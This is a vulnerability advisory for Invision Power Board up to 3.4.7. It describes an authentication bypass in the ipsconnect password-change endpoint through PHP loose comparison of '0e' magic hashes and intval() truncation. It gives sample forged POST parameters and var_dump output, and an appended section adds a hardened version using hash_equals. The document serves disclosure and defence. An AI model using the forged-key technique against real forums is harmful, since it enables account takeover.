# Exploit Title: Invision Power Board <= 3.4.7 password change
# Date: 25.11.2014
# Exploit Author: ZeroDay
# Software Link: http://www.invisionpower.com/
# Version: <= 3.4.7
# Tested on: 3.4.7
# About: For the G-Owl with Love
Vulnerable code (interface/ipsconnect/ipsconnect.php):
public function change( $id, $key, $username, $displayname, $email, $md5Password, $redirect, $redirectHash )
{
    // loose (type-juggling) comparison of the caller-supplied key against the expected md5
    if ( $key != md5( $this->masterKey . $id ) )
    {
        $this->_return( base64_encode( $this->settings['board_url'] ), array( 'status' => 'BAD_KEY' ) );
    }
    // $id is passed through intval(), so a non-numeric suffix is silently dropped
    $member = IPSMember::load( intval( $id ), 'none', 'id' );
    if ( !$member['member_id'] )
    {
        $this->_return( $redirect, array( 'status' => 'NO_USER' ) );
    }
    ...
The line `if ( $key != md5( $this->masterKey . $id ) )` uses the loose comparison `!=`. In PHP, `!=` (like `==`) compares two numeric-looking strings as numbers, so any string of the form `0e<digits>` is treated as 0 and compares equal to any other `0e<digits>` string.
If `$this->masterKey` is "1234", then the comparison can be passed by sending the POST parameters `id=1x5306758&key=0e123`, where "1x" is taken as the user_id (intval() stops at the first non-digit, so the lookup is done for member 1):
var_dump(intval('1x5306758')); //int(1)
var_dump(md5('1234'.'1x5306758')); //string(32) "0e206089892480803868366430752394"
var_dump('0e123' == md5('1234'.'1x5306758')); //bool(true)
BUT! Since we do not know the `$this->masterKey` value, the only things we can hope for are bruteforce and luck ;)
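To make the defect concrete from the fixing side, here is an added example (not code from the advisory or from Invision Power Board) that puts the vulnerable loose comparison next to a hardened one and adds the id validation the original method lacks. The master key "1234", the id "1x5306758" and the key "0e123" are the advisory's own values; the function names are hypothetical.

```php
<?php
// Added example, not from the original advisory or the IPB code base.
// Values "1234", "1x5306758" and "0e123" are taken from the advisory above;
// the function names are hypothetical.

// Vulnerable form: the same loose comparison the advisory's change() uses.
// Two numeric strings are compared as numbers, so "0e123" and
// "0e206089892480803868366430752394" are both 0 and therefore "equal".
function keyMatchesLoose(string $masterKey, string $id, string $key): bool
{
    return !($key != md5($masterKey . $id));
}

// Hardened form: hash_equals() compares byte for byte (and in constant
// time) and never applies PHP's numeric-string juggling.
function keyMatchesStrict(string $masterKey, string $id, string $key): bool
{
    return hash_equals(md5($masterKey . $id), $key);
}

// Validate the member id as a plain positive decimal integer *before* it is
// used, so that a value such as "1x5306758" is rejected instead of being
// silently truncated to 1 by intval().
function validMemberId(string $id): bool
{
    return ctype_digit($id)
        && $id === (string) (int) $id   // no leading zeros, no overflow
        && (int) $id > 0;
}

$masterKey = '1234';
$id        = '1x5306758';
$key       = '0e123';

var_dump(keyMatchesLoose($masterKey, $id, $key));
var_dump(keyMatchesStrict($masterKey, $id, $key));
var_dump(validMemberId($id));
var_dump(validMemberId('5306758'));
```

With the advisory's values, keyMatchesLoose() accepts the forged key because md5('1234' . '1x5306758') happens to be a `0e` string, while keyMatchesStrict() rejects it, and validMemberId() rejects "1x5306758" but accepts "5306758". Beyond the comparison itself, a keyed MAC (hash_hmac) over the id would be a sounder construction than md5 of a concatenation, but the loose comparison is the defect this advisory describes.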